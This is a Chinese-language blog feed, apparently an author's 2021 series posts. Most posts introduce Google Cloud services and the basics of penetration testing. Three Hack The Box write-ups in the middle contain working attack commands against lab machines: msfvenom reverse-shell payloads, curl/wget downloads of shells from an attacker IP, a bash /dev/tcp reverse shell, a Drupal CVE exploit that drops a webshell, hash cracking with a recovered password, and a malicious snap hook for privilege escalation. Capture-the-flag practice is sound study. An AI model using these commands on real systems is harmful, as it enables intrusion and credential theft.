在主從式架構中，我們可以將一個 Cluster 中的內容歸類為兩種元件，Master 與 Node， Master 負責進行控制與管理 Nodes；而 Nodes 則負責執行 Container 的內容。在 Google Cloud 中，每一個 Node 代表了一台 Compute Engine 的 Instances。

GKE

Google Kubernetes Engine 簡稱 GKE，是由 Google 管理的的 K8s 引擎，支援 Google Cloud 上各種不同規格的 Compute Engine instances。

[Day13] Containers (2021 鐵人賽 – Cloud)

Tue, 28 Sep 2021 19:00:00 +0800

我們都知道，Compute Engine 屬於 IaaS ，而 App Engine 等服務屬於 PaaS，在 PaaS 底下，使用者大多不需要處理系統底層的問題。

但有些時候，我們會希望可以同時擁有 IaaS 與 PaaS 的優點，可以設定部分底層的資源，又希望可以透過雲端平台幫我們自動化的管理，這個時候，就可以使用 Kubernetes (K8S) 的服務，關於 K8S 相關的內容預計將於明天介紹，今天會介紹 K8S 底層的東東： Container。

虛擬化容器與 VM (虛擬機) 非常類似，但是原理上有所差異。通常， VM 會模擬整個電腦硬體、CPU，包含指令集等所有的內容，因此 VM 最被大家詬病的問題就是，需要浪費非常多的系統資源。在 CPU 層面，需要模擬整個電腦硬體，而在儲存層面，也需要安裝整套的作業系統。

容器的虛擬化則是將作業系統層進行虛擬化，與當前在運行的作業系統共用資源，省去了虛擬化硬體的部分，可以達到非常的輕量化。我們可以將自己的服務打包在容器中，未來在搬移時，僅需要將容器移植到其他台電腦，即可快速的部屬各種不同的服務。

Docker

雖然說，Container 的技術不僅只於 Docker，但目前來說，Docker 算是最知名，最通用的一款 Container 技術。

以 Docker 為例，如果我們需要建立一個 Docker 的容器，需要一個 Dockerfile ，定義我們容器中各種參數，例如需要繼承哪一套的 image，並且需要在自己的容器中執行哪些的參數；掛載的檔案；網路連線等。

每一個容器中，可以安裝多個程式，例如 Apache 、 MySQL 、 Python 等，不過根據 Docker 官方的建議，最好每一個容器僅安裝一套的服務，可以稱為 (Micorservices) 微服務。

我們可以在地端，自己的電腦中建立好一套完整的服務，並將 Docker 的各種服務部屬到 Compute Engine 的 Instances 上。

[Day12] Firestore (2021 鐵人賽 – Cloud)

Mon, 27 Sep 2021 18:59:00 +0800

前幾天總共介紹了4種不同的儲存方式，今天要來介紹最後一種： Cloud FireStore。 Firestore 跟 Bigtable 一樣，是一種非關聯式的 NoSQL 資料庫。相較於 Bigtable ，它適合儲存相對較小的資料，且價格便宜非常多，也有每天的免費扣打可以使用。

Firestore 是一種 Serverless 的服務，可以簡化儲存、查詢跟各種同步相關的使用需求，主要提供給行動裝置、網頁以及物聯網裝置使用，它也無縫的整合了 Firebase 的驗證機制。

Firestore 支援資料庫的 ACID，保障資料的可靠性。

Atomicity 原子姓一個事務的所有操作，不可分割，不可約簡。
如果過程中發生錯誤，必須還原 (Rollback) 回事務開始前的狀況Consistency 一致性- 在事務的開始前與結束後，確保完整性沒有被破壞。Isolation 事務隔離- 允許同時發起多個事務進行讀寫與修改，藉由隔離可以防止事務交叉執行導致資料的不一致。Durability 持久性- 事務結束後，對於資料的修改就是永久的，故障也不會丟失。

Firestore 會自動的進行 Multi-region 的複製，保障資料的完整性，由於 Server 是完全由 Google 管理，因此對於複雜的 NoSQL Query，也不會降低效能。

目前的 Cloud Firestore 有兩種模式，分別是 Datastore Mode 與 Native Mode。

Datastore Mode向下相容於 Datastore 的 ApplicationNative mode- 更強健的 Storage layer
基於 Collection 以及 document 的 data model
支援 Mobile 以及 Web 的客戶端函式庫

Storage 總結

這幾天總共介紹了 Cloud Storage 、 Cloud SQL 、 Cloud Spanner 、 Cloud Big Table 、 Cloud Firestore 等不同的資料儲存方式，那我們要怎麼樣選擇最適合自己的儲存方案呢？

[Day11] Big Table (2021 鐵人賽 – Cloud)

Sun, 26 Sep 2021 18:58:00 +0800

~~雲端大桌子~~，是一種 NoSQL 的資料庫，可以支援 TB 等級的應用，且支援 HBase 的 API，可使用於大數據、 Hadoop 等環境之中。

NoSQL

講到 NoSQL 就要回來重新提一下什麼是 SQL ， SQL 就像一張桌子表格，我們每次的新增都會依照表格的固定 Column 來新增 Row，每一條的 Row 都要依照著 Column (Table schema )的欄位來填寫。

很多情況下，我們新增的資料不見得每次都會把每個 Column 給填滿，這種情形下就會成為稀疏矩陣的感覺，造成資源的浪費。而 NoSQL 正是基於這種想法，提出的非結構化資料儲存系統。

適用環境

Cloud Bigtable 擅長處理批次的 MapReduce 等操作，以及 Stream 的處理/分析，以及機器學習等。在實際的場合底下，Bigtable 適合以下幾種資料

銷售資料例如購買紀錄
使用者偏好金融資料- 交易紀錄
股票價格
貨幣匯率物聯網資料- 各種感測器資料
記錄檔案
分析報告時間序列資料- 例如 CPU 以及 Memory 的使用率等

Bigtable 的最大特色

特色大：資料可以支援超過 1 TB
快：高吞吐量
NoSQL ：非關聯資料庫適用資料- 時間序列
大數據
機器學習

[Day10] Cloud Spanner (2021 鐵人賽 – Cloud)

Sat, 25 Sep 2021 18:57:00 +0800

Spanner 🔧，跟 Cloud SQL 一樣，是一種 RDBMS (Relational Database Management System)，它同時包含了關聯式資料庫與非關聯式資料庫的優點，支援 SQL 的語法，~~然後很貴~~。

Spanner 最大的優點是它可以達成 Horizontal
Scalable 的資料結構，它可以處理 PB 等級的資料，而且有極高的可靠性(SLA 高達 99.999%)，適合使用於金融與庫存等應用上。

Spanner 是 Google 開發的酷酷資料酷系統，他們也為此發了紙 Spanner: Google’s Globally-Distributed Database，~~但我是沒有很想看啦QQ。~~

Cloud Spanner Architecture

Cloud Spanner 會同時將資料放在多個 Zone 中，這些 Zone 可以跨 Region，使用者可以自己設定，想要將資料放在哪個 Region，透過這種概念達到極高的可用性。

多個 Region 間的資料，會透過 Google 的光纜進行同步，並且透過原子鐘來校對時間，確保其原子性。

Spanner 與 RDBMS / N-RDBMS 比較

圖片來源：Google Cloud

[Day9] Cloud SQL (2021 鐵人賽 – Cloud)

Fri, 24 Sep 2021 18:57:00 +0800

昨天介紹完了儲存各種檔案可以使用的 Cloud Storage，今天要來介紹另外一個很常見的儲存服務：SQL。相信有架過網站的人都知道 SQL 的重要性， SQL 屬於一種 RDBMS (Relational Database Management System)，關聯性資料庫系統，相較於非 RDBMS 的資料庫系統，我們通常會稱為 NoSQL。

在通常的情況下，如果我們需要架設一個 SQL 的 Server ，可能會先準備一台伺服器，安裝完作業系統後，再使用 Docker；或直接安裝 SQL 的資料庫程式，建立一個資料庫的伺服器。

如果透過了 Cloud SQL，我們可以將這一系列的事情全部交給 Google，僅需要一鍵開啟一台 Cloud SQL 的機器即可。

Cloud SQL 目前支援 MySQL 、 PostgreSQL 與 Microsoft SQL Server 的資料庫服務。

Cloud SQL 還有以下幾種優點：

Automatic update如果各大 SQL 服務出現了重大的漏洞與更新，Google 可以自動化的將服務更新。Automatic replication- Cloud SQL 支援自動複製，可以直接複製一台當前的 SQL 機器，提供備份或測試等多種使用情境。Managed backups- Cloud SQL 可以負責自動化的管理備份，每個 instance 最多可以管理 7 個備份。Scaling- 可以讓擴展機器，將目前的機器硬體規格升級成更高級
需要重新開機

SQL 性能

透過 Cloud SQL 選擇的 instance 會對 SQL 的效能進行最佳化，最高可以使用：

[Day8] Storage (2021 鐵人賽 – Cloud)

Thu, 23 Sep 2021 18:56:00 +0800

介紹完了虛擬機器與網路後，接下來要跟各位介紹的是關於雲端的儲存方案。Google Cloud 有許多雲端儲存的服務可以供大家選擇，例如 Cloud Storage 、 Cloud SQL 、 Cloud Spanner 、 Cloud Datastore 與 Cloud Bigtable。今天會與各位介紹最直觀，最直覺的 Cloud Storage。

簡介

Cloud Storage 主要可以用來儲存各種 Binary 的檔案，例如圖片檔、壓縮檔等。根據新聞報導，包含了蘋果、抖音等各大公司，背後都有使用到 Google Cloud 的 Storage 服務，蘋果更是使用到了 8 Exabytes 之多。如果沒有意外的話，Google Drive 背後就是運行 Cloud Storage 的服務。

Cloud Storage 預設會將所有資料進行加密，並使用 HTTPS / TLS 進行傳輸。可以取得 HTTPS 的直接連結，作為圖床使用。

Cloud Storage 不能算是一種檔案系統，它是透過 Bucket 的方式儲存不可變(immutable) 的檔案；不過也有第三方的工具 Cloud Storage FUSE 可以將 Cloud Storage 掛載成虛擬的網路硬碟。

Class

Cloud Storage 分成了 4 種不同的 Class ，分別是 Multi-regional 、 Regional 、 Nearline 與 Coldline，他們的價格與使用情境有許多的不同。

Celestial (Hack The Box Writeup)

Thu, 23 Sep 2021 13:51:00 +0800

URL : https://app.hackthebox.eu/machines/130
IP : 10.129.217.35

Recon

掃 PortnmapAutomator.sh -H 10.129.217.35 -t recon
掃路徑- 首頁 404- 發現有餅乾- F5 後-
發現餅乾是 Serialize

Serialize

import requests
import base64

src = b'{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}'
dst = base64.b64encode(src).decode('ascii')
cookies = {
 'profile': dst
}

headers = {
 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Connection': 'keep-alive',
 'Upgrade-Insecure-Requests': '1',
 'If-None-Match': 'W/"c-8lfvj2TmiRRvB7K+JPws1w9h6aY"',
 'Cache-Control': 'max-age=0',
}

response = requests.get('http://10.129.217.35:3000/', headers=headers, cookies=cookies)

print(response.text)

亂戳

{"username": "meow" ,"country":"Idk Probably Somewhere Dumb","city":"Lametown","num": true}

會回傳

Hey meow true + true is 2

戳

Buff (Hack The Box Writeup)

Thu, 23 Sep 2021 13:48:00 +0800

URL : https://app.hackthebox.eu/machines/263
IP : 10.129.2.18

Recon

掃 Port掃目錄-
/Readme.md觀察首頁-
SQL 檔案
找到專案 Project- https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/
預設密碼，登入失敗試用 Exploit- 準備另外一個 reverse shell- 確認 Systeminfo- 取 Userflag-

提權

確認 Defender 有開產 Shell- msfvenom -p php/reverse_php LHOST=10.10.16.35 LPORT=7877 -f raw > shell.php
powershell -c "wget http://10.10.16.35/shell.php -outFile shell.php"亂逛系統- 觀察開的 Port- netstat -ano -p tcp
觀察執行中的 Process- tasklist
發現 Downloads 資料夾有 CloudMe_1122.exe-
觀察開的 Port-
8888 但他只綁 127.0.0.1

Exploit

本地端執行./chisel server -p 9999 --reverse遠端執行- chisel.exe client 10.10.16.35:9999 R:8888:127.0.0.1:8888
把 Port 轉回 127.0.0.1:8888收封包- 使用 Exploit- https://www.exploit-db.com/exploits/48389修改 shell code- msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=4444 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
收 Reverse shell- 取得 Root flag-

Armageddon (Hack The Box Writeup)

Thu, 23 Sep 2021 13:37:00 +0800

URL : https://app.hackthebox.eu/machines/323
IP : 10.129.216.90

Recon

nmapAutomator.sh -H 10.129.216.90 -t recon80
22

Exploit

https://github.com/pimps/CVE-2018-7600

Webshell

python3 drupa7-CVE-2018-7600.py http://10.129.216.90/ -c "echo ' s.php "
確認電腦裡有 curl下載 reverse shell- curl http://10.10.16.35/s_HTB -o s
但發現戳不回來傳 b374k- http://10.129.216.90/s.php?A=curl%20http://10.10.16.35/b374k.php%20-o%20s.php
戳 reverse shell
發現權限不足Try msf shell- msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7878 -f elf > shell1
給權限-
還是沒權限試試看如果連 80 port- bash -c 'bash -i >& /dev/tcp/10.10.16.35/80 0>&1'
成功

提權

收 Reverse shell載豌豆- 發現一些密碼-
drupal-6.user-password-token.database.php
spawn- perl -e 'exec "/bin/bash";'dump mysql- mysqldump -u drupaluser -h localhost -p drupal > a.sql找到一組 hash-
確認使用者名稱- 爆破 hash- hashcat -m 7900 hash.txt /opt/rockyou.txt
取得帳密- brucetherealadmin
booboo切換使用者-

提權

直接用 SSH 登入
發現可以用 sudo snap本地- gem install fpm
https://gtfobins.github.io/gtfobins/snap/#sudo照做提權-

COMMAND="bash -c 'bash -i >& /dev/tcp/10.10.16.35/80 0>&1'"
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

傳上去收 Reverse shell- 取得 Root-

[Day7]Virtual Networks (2021 鐵人賽 – Cloud)

Wed, 22 Sep 2021 18:55:00 +0800

今天來介紹虛擬網路的部分，既然我們都有各種的虛擬機器、虛擬服務，那想當然，這些服務就是透過虛擬網路進行連線。虛擬網路如同現實網路一樣，也有許多需要在意與設定的地方，例如 IP 、 Routing 或防火牆等。

VPC

虛擬私人網路 (VPC, Virtual Private Cloud) ，就如同現實生活中的 LAN ，可以將虛擬網路彼此的進行連接或隔離。一個 Project 預設可以有 5 個虛擬網路，這些網路除了自己使用之外，也可以跟其他的 Project 互相共享。這些虛擬網路中的 IP 沒有嚴格的限制範圍；我們也可以設定自己在歐洲與亞洲的機器於同一個區網內。我們也可以藉由 Cloud VPN 等方式將自己地端的設備接入雲端，Cloud VPN 相關技術將於之後的文章再跟大家介紹。

VPC 在 Google Cloud 中有三種模式，分別是 Default 、 Auto 與 Custom

Default Mode

在每一個 Project 中都會預設一個 Default Mode 的網路，他們在每一個 Region (可跨 Zone) 中都是一個 Subnet，所以，它有預設的防火牆 Rule。事實上， Default Mode 的 VPC 網路，就是透過接下來要介紹的 Auto Mode 生出來的。

Auto Mode

Auto Mode 如同 Default Mode，它會自動生成，每一個 Region 中會有一個 Subnet，而每一個 Subnet 預設的 IP Range 使用了 /20 的子網路遮罩，最高可以擴充為 /16。

[Day6]Virtual Machines (2021 鐵人賽 – Cloud)

Tue, 21 Sep 2021 18:55:00 +0800

今天要來介紹的是雲端的虛擬機器 (VM)，屬於雲端 IaaS 最具有代表的一項產品。相信有許多讀者應該都有在自己電腦上使用虛擬機的經驗吧？例如 Virtual Box 或 VMWare 等程式，虛擬機在實用上有非常多的優點。

虛擬機的優點

虛擬機最大的優點就是可以與實體機器隔離，做任何的事情都不會影響到原始的機器。除此之外，在假設 Host 電腦的效能與容量足夠的前提下，我們也可以隨時地變更虛擬機的硬碟大小、CPU大小、硬碟容量等。我們也可以直接針對整台虛擬機的映像(image)檔案進行快照(snapshot)，作為即時的備份使用。

如果我們有很多台的虛擬機，也可以建立虛擬的網路將他們互相連起來；有關雲端的虛擬網路 (VPC)，我們會留到明天再跟各位進行介紹。

上述這些虛擬機的優點，無論是地端與雲端的設備都可以運用的到，而雲端的機器由於是交由服務商進行管理，所以對於正常使用者來說，我們可以視為 host 的機器將近是無限大，想要開多少都沒有問題！

vCPU 與 Throughput

一個 vCPU 等同於一個硬體的超值行續 (Hyper-Theread)，以目前的 GCP 規定，一台的 VM 最多可以開 96 個 vCPU 。

一個 vCPU 的網路吞吐量 (throughput) 為 2Gbps。到目前為止，若使用一台大於等於 16顆 vCPU 的裝置，其網路的 throughput 最高為 32Gbps。如果開啟特殊的虛擬機，例如使用到高級 GPU 的 V4 或是 V100 ，則可以到 100 Gbps。

Storage

虛擬硬碟方面，在 GCP 上面也有幾種選擇，分別是 Standard 、 SSD 與 Local SSD。不同的硬碟選擇，想當然的，就是他們的性能與價格有所差距，大家可以依照自己的需求選擇最適合的硬碟解決方案，而這三種硬碟分別的差距如下：

Standard可以理解成普通的電腦機械式硬碟
透過網路連接上 VM
它們的容量可以視需求彈性的增加(只能增加不能減少)
最大值在每台 VM 上可以有 257 個 TB
最便宜SSD- 相對於 Standard ，可以有更高的 IOPS
透過網路連接上 VM
也可以在線的增加容量(只能增加不能減少)
最大值在每台 VM 上可以有 257 個 TB
價格其次Local SSD- 比起 SSD 有更高的吞吐量，且低延遲
直接硬體的連接在 VM 上
關閉、刪除 VM 後，資料就會被刪除
通常拿來作為 swap 使用
單顆 Local SSD 最大容量為 375GB
一台 VM 最多可以連結 8 顆 Local SSD

VM Access

通常我們訪問雲端的 VM 都是藉由網路的方式，在大多數情況下， Linux 的作業系統我們會使用預設為 22 Port 的 SSH，而 Windows 作業系統則會使用預設為 3389 Port 的遠端桌面連線 (RDP)。

[Day5] Project,IAM (2021 鐵人賽 – Cloud)

Mon, 20 Sep 2021 18:53:00 +0800

今天要來介紹的是，剛進入雲端一定會面對到的部分：Project以及 IAM。我覺得這個相關的主題會是雲端裡面數一數二無聊的 QQ，但以一個完整的雲端架構而言，這卻是非常非常重要的部分。特別是 IAM 這個主題，單純這個主題，事實上身為一個雲端管理者、架構師，就可以上一整個月的課程了。

Project

任何的 GCP 服務，都會屬於一個 Google Cloud Console 的 Project，無論是管理 API 、管理計費方式、增加其他的協作者等都是基於 Project 為單位，而一個 Project 底下則可以有許多的資源 (Resources)。

一個 Project 可以包含非常多的使用者，且每個 Project 都是一個獨立的單位，獨立的隔間，他們會分開的計費。

每一個 Project 會有三個相關的識別屬性

Project ID可以自己定義，它必須是 Global Unique 的
設定完後就不可更改Project Name- 可以自己定義，不需要 Unique
設定完後仍然可以再次修改Project Number- 不可自行定義，由 GCP 自動產出
不可自行更改

Project 階層式管理

GCP 也可以透過階層式的進行管理，以一個公司為例，通常會使用組織節點 (Organization Node)，而一個公司底下可能會有不同的部門，這個時候就可以透過資料夾 (Folders) 進行管理，而每一個部門底下也可能會有多個 Project；每個 Project 底下則又可以有多個 Resources，範例如下圖所示。

圖片來源：Google Cloud Creating and managing Folders

不同的資料夾間，可以設定不同的 IAM 權限管理政策，通常來看，整個公司架構的樹狀圖中，位居越高位的管理權限越大，而越下面的權限越低。

IAM

Identity and Access Management (IAM)，身分以及訪問權限管理，是雲端管理之中，最最重要的一件事情。如果一個 IAM 的階層管理做得越完善，越齊全，就越不可能會遇到一些看起來很荒謬的事情。

[Day4] Google Cloud (2021 鐵人賽 – Cloud)

Sun, 19 Sep 2021 18:52:00 +0800

今天的內容會跟各位介紹 Google Cloud 相關的基礎知識，希望不會不小心的講成像業配文QQ，先聲明，我沒有拿到 Google 給我的任何 $$ QQ。

GCP 提供了多種類型的服務

GCP 的服務，從低層級到高層級，包含了 IaaS 、 Hybrid 、 PaaS 、 Serverless logic 與 Automated elastic resources。越低層級的內容，使用者可以控制的參數就越多，設定也比較複雜；越高層級的服務須要設定的參數就越少，可以快速且方便的使用，不過相對應的，彈性與客制化程度就比較低。特別是機器學習的部分，Google 提供了許多方便的 API 供大家使用，這些 API 甚至可以讓不會寫程式的人快速的接入各種方便的應用。

以下為 GCP 常見的服務列表

運算資源Compute Engine
Kubernetes Engine
App Engine
Cloud Functions
……儲存資源- Bigtable
Cloud Storage
Cloud SQL
Cloud Spanner
Cloud Datastore
……大數據- BigQuery
Pub/Sub
Dataflow
Dataproc
Datalab
……機器學習- Natural Language API
Vision API
Machine Learning
Speech API
Translate API
……

Google Network

根據資料顯示， Google 目前在全世界的網路下，成載了世界的 40% 的流量，是世界上最大的網路商。它的海底光纜的總長度更超過了 10 萬公里，投資了數十億美元建至，確保了 Google 各種服務的穩定性。

[Day5] Process (2021 鐵人賽 – PT)

Sun, 19 Sep 2021 18:34:00 +0800

一個滲透測試的流程，可以簡略的分成兩大階段，資訊蒐集與漏洞利用。而資訊蒐集階段則又可以分為偵查與掃描；而漏洞利用則又可以分為普通的漏洞利用與提權，這邊來與各位介紹一下這幾個階段分別具體需要實作的事情有哪些。

偵查

當我們獲取了一個目標，剛開始，我們會需要嘗試著蒐集各種與目標相關的公開情報。以公司來說，我們可以透過各種的搜尋引擎獲取機構的部分資料，例如人士、Email、電話等。很多時候這些資料對於後續的攻擊流程會有很大的幫助。

接下來我們可以試圖了解我們攻擊目標相關的資料，例如使用的作業系統版本，伺服器版本等，假設是一個指定網段的資料蒐集，除了自行的動手掃描之外，我們也可以藉由許多開放資料的平台，例如 Shodan 、 ZoomEye 等。

通常在做偵查的階段，我們也會同時的進行掃描的動作，偵查與掃描主要是為了可以讓我們更進一步的了解我們的目標，確立可以攻擊的弱點等。

掃描

在進行了一系列的偵查之後，我們就可以開始嘗試著對攻擊的目標進行資訊的掃描。通常面對一台伺服器，我們的起手式會是對端口(Port) 進行掃描，目的是觀察伺服器有開了哪一些的服務，在這邊，通常我會使用的工具是 nmap 與 rustscan 等。

如果是網頁伺服器，通常可以對網頁的目錄進行掃描，這邊常見的工具有 dirsearch 、 dirb 、 gobuster 等；部分掃描路徑的工具，也具有掃描 Sub-domain 的功能，例如 gobuster 與 ffuf 等，我們也可以觀察瀏覽器中的 header 等資訊，或是透過 Wappalyzer 工具進行分析。

偵查與掃描通常不會一次就全部的完成，例如我們掃描到了某個 Port 號，開啟了一個網頁伺服器，則可能會再透過人工方式對於這個網頁伺服器進行一些偵查的工作；而偵查完畢後，則可能更換下一個 Port 號開啟的服務進行進一步的偵查與掃描。

尋找漏洞

待我們在偵查與掃描獲得了各種的資訊，就可以試著尋找網路上對於該版本的作業系統、伺服器軟體是否有公開的弱點 (CVE)，如果有相關弱點的話，是否有可以進行漏洞利用(Exploti)的腳本，在這邊，通常我會直接在 Google 上搜尋 {服務版本} Exploit，除此之外，也可以透過 exploit-db 、 searchsploit 以及 Github 等方式查找相關的利用方式。

很多時候，我們查找到了某些的漏洞，卻不一定可以馬上地進行使用。舉例來說，我們發現了某個 CMS 在相應版本中的漏洞，而它的使用條件是需要先進行登入，在這種條件下，我們可以先暫存著相關的資訊，以備不時之需，並試圖尋找與開發其他漏洞。

漏洞利用

尋找完相關的 Exploit 腳本後，我們就可以試著執行這些腳本，達到漏洞利用的效果。很多時候，我們也可能需要串接多個不同的漏洞，才能達到遠端命令執行 (RCE)。

當然在大多數情況下，我們不一定有辦法尋找到相對應版本的漏洞進行利用，這種時候就需要透過人工對各個目標進行測試。這種情境下就會比較類似 CTF 的思路，以網頁為例，通常就會以 OWASP Top 10 上常出現的漏洞開始下手進行測試。而 Binary 的 Protocol 則有可能會需要使用到 CTF 中， pwn 的相關技術，進行 Binary Exploitation 利用 Buffer Overflow 等。

[Day4] Tools And Environment (2021 鐵人賽 – PT)

Sun, 19 Sep 2021 18:33:00 +0800

今天來介紹一下滲透測試常用的環境與工具，正所謂工欲善其事，必先利其器。準備好自己熟悉、習慣的作業系統與程式環境，對於後續的各種事情都可以事半功倍。

虛擬機

通常，對於滲透測試相關的設備與環境，我們都會使用虛擬機(Virtual Machines)，目前常見的軟體有 VirtualBox 、 VMWare 、 Parallel Desktop 與 Qemu 等。大家可以挑選自己習慣的環境，除了使用習慣上，基本上以初學者來講，虛擬化環境沒有太大的差別，如果各位仍沒有任何偏好的化，我會建議大家從 VirtualBox 開始。如果需要使用 VMWare 的話，也請務必採用付費的 Workstation 或 Fusion 版本，才能方便使用完整版的功能，例如 Snapshot

作業系統

作業系統方面，通常我會建議至少同時需要準備一個 Linux 的作業系統，以及一個 Windows 的作業系統，這樣比較能快速的應付各種的需求與測試。作業系統的版本與偏好，則也是看大家的習慣而定。

以 Linux 作業系統為例，許多人都會推薦使用 Kali Linux 與 Parrot OS，但其實我個人反而比較喜歡乾淨的 Ubuntu 作業系統， Kali,Parrot Linux 最大的特色與優點是，他集成了非常多常見的紅藍隊工具，可以讓使用者快速的上手，免去了各種安裝的麻煩；相對之下，Kali Linux 的缺點則是，它太像一個軍火庫了，裡面的工具過多，也常常得使新手產生混亂。而對於某些需要指定特殊版本的程式，在 Kali 上也有可能會出現一些小問題，但本次鐵人賽主要使用的 Linux 環境，我預計仍會採用 Kali Linux，因為可以省去許多安裝環境的麻煩。

而 Windows 環境就比較自由一點了，通常建議可以使用 Windows 10 的 Pro 版本以上，或是 Windows Server 的各種發行板，主要 Windows 的作業系統是用來處理一些，面對到 Windows Server 的靶機，我們可以在自己的 Windows 作業系統上做各種的實驗與演練，待測試完成後，再將指令與程式攻擊至靶機，以本次鐵人賽而言，預計都會以 Linux 的作業系統為主，如果想要手把手跟著做的朋友們，不需要急著安裝也沒有關係！

程式

很多人都在詢問，想要當一駭客到底要學會什麼程式語言，要學會哪些工具。我覺得，如果要成為一位厲害的資安技術人員，不太可能單靠學會幾樣的工具與程式語言就能應付所有的環境。關於程式方面，這邊大概列一些最最基本的軟體，主要提供給非使用 Kali Linux 作業系統的使用者，以利後續的其他工具安裝。

[Day3] Cloud Architectures (2021 鐵人賽 - Cloud)

Sat, 18 Sep 2021 18:51:00 +0800

講到雲端相關的議題，一定會看到的就是 IaaS 、 PaaS 與 SaaS。這幾個名詞可以算是雲端的三種層次，雖然我覺得，很多時候某些雲端服務不一定可以明確的區分他屬於哪一種層次，不過，其實也沒有太重要XD。既然大家都這麼的愛用，那我們就還是來了解一下他們分別的意義吧！

IaaS (Infrastructure as a Service)

IaaS，基礎設施即服務，可以算是以雲端的角度而言，與地端的機器最相近的服務。如果用過 vCenter 等裝置的話應該可以想像，它就是可以在雲端開啟虛擬機器。就算沒有接觸過任何的虛擬機器也沒關係，我們可以想像成，就是在雲端幫我們準備了一台我們定義好規格的電腦。

使用 IaaS ，我們等同於可以直接的管理，控制整台電腦的所有功能，舉凡硬碟存取，網路存取，也可以完整的訪問 CPU 以及 Memory ，提供了最大的可控制性。但俗話說的好，能力越大，責任越重，在 IaaS 的環境底下，使用者虛擬主機上遇到的所有軟體相關問題，雲端的服務商也都不需要負責，雲端服務商只負責，並保證機器是可以被正常的運行的。

PaaS (Platform as a Service)

PaaS，平台即服務，相較於 IaaS ，我們不需要在意機器這麼底層的東西。較底層的基礎設施、作業系統與程式相關，都由雲端的廠商進行處理，使用者甚至不需要處理任何的軟體更新等問題。

假如說，我們的需求是需要架設一個 MySQL 的 Server。如果以地端的機器，或是以 IaaS 為角度來看的話，我們通常會先需要準備一台電腦，安裝一個 Linux 的作業系統，這個時候，會需要考量要使用到 Ubuntu 、Debian、 CentOS 等；等待安裝好了作業系統，接下來要安裝 MySQL 的 Server，這個時候又要考量說，我們的服務是否需要放在 Docker 的 Container 中，或是 MySQL 需要安裝多少的版本。

上述的這些問題，如果我們使用了 PaaS 中的資料庫相關服務，滑鼠點兩下，選擇開啟一台 Cloud SQL，等待幾分鐘的時間，雲端的廠商就全自動地幫我們處理好這樣的需求了！

SaaS (Software as a Service)

SaaS，軟體即服務，這相信是大家目前都已經有接觸的一種雲端服務。基本上我們可以直接把這邊的 Software 視為一種產品。舉例來說 Google Drive 就算是一種 SaaS 的產品。我們可以開心的使用 Google Drive ，大家從來都不會在意或想過說：Google Drive 背後跑的是怎麼樣的作業系統，是 Linux 嗎？ Google Drive 背後有沒有使用到 Hadoop 的 HDFS 之類的技術？作為一個使用者來看，我們完全不需要在意以上所說的這些事情！只需要專注地使用我們的服務就好！

[Day3] Practice Resources (2021 鐵人賽 – PT)

Sat, 18 Sep 2021 18:32:00 +0800

CTF 通常會依照各種領域區分， Web 、 Reverse 、 Pwn 、 Crypto 等。而滲透測試如果一定要區分在這些領域的話，應該會比較偏向 Misc。滲透測試通常都會是以組合技為主，所以 CTF 的各種領域最好都要有基礎的了解。

CTF 資源

以新手導向的 CTF 資源，我推薦 picoCTF，上面的題目都非常的新手友善，關於 picoCTF 的解題內容，也歡迎觀看隔壁棚，我的隊友 Yvonne 的鐵人賽文章。

除了 picoCTF 之外，對於初學者學習 CTF 類資源，又與 PT 叫相近的，也推薦大家可以使用 RootMe。

靶機資源

有了基礎的 CTF 各領域技術後，接下來就可以進入練習滲透測試技能的階段。在這邊，我主要推薦四大平台：

TryHackMeTryHackMe 是這三個網站中，筆者最推薦的一個平台，上面有數以百計的 Linux 與 Windows 機器，也有一系列的滲透測試相關教學，可以依照著指示與提示，手把手的帶著大家解題，算是三者中對於新手最友善的平台。
其免費版就有不少的機器可以使用，而付費版則有更多課程與靶機。感謝飛飛ㄉ錢包贊助 QAQ。Vulnhub- Vulnhub 上有許多靶機的虛擬機 ova 檔案，可以部屬在自己的電腦中
不過對於電腦效能有限的人可能會有一點不友善
另外也可以將 ova 檔案部屬到雲端平台上進行練習HackTheBox- HackTheBox 是網路上最多人推薦的平台，但筆者覺得他也有些許的缺點 QQ
其上面免費版的靶機通常都會是多人共用，(數人到數十人不等)很多時候會造成互相的干擾，除非使用 VIP+ 的方案他是一個綜合性的資安網站，除了滲透測試的靶機之外，也有許多軟硬體相關的 CTF 題目

在此我建議，各平台的靶機，如果有機會都可以去嘗試看看。如果只選擇一個平台的，一定會遇到一些的盲點。本次鐵人賽的內容前半主要會以 TryHackMe 上的靶機為主，預計後半可能會刻金買 HackTheBox 來玩。

證照資源

與滲透測試相關的證照，最有名的就是 OSCP 證照，是由 Offensive Security 提供的 Penetration Testing with Kali Linux (PEN-200)。它算是少數資安領域中的實做型證照，考試內容為在 24 小時內打下 5 台指定的靶機，並取得 root / System 權限，非常推薦大家對於滲透測試有了一定的認識後報考。

[Day2] What is Cloud (2021 鐵人賽 - Cloud)

Fri, 17 Sep 2021 18:48:00 +0800

Cloud ??

今天來跟各位介紹一下到底什麼是雲端。

4ㄉ，所謂的雲端就是先教會電腦怎麼飛行，而通常的飛機都會在大氣的平流層之中，也就是距離地面 7 至 11Km 到 50Km 之間，平流層的特性是氣流會相對比較穩定。相較之下，平流層下面的對流層通常就是雲會出現的區域，也就是我們考慮的雲端。

而電腦領域的雲端呢，則會讓我想到這張圖。

對於雲端而言，跟大多數的普通人聊到「雲端」，大家的第一反應可能會想到「雲端硬碟」，沒錯！這就算是一個最基本的雲端相關的應用。

所謂的雲端我認為可以簡單的分為，雲端的儲存與雲端的運算，而雲端的雲，指的只是我們看不到，摸不到的遠端伺服器，這些伺服器都會由各大營運的設備商進行維護。要感謝的人太多了，所以就謝天吧；資料的來源太多了，所以就說從天上來的吧，我覺得，或許這就是雲端之所以稱做雲端的理由。相較於我們摸的到的機房伺服器而言，雲端有許多的優點，當然不乏也有一些缺點。

雲端的優點

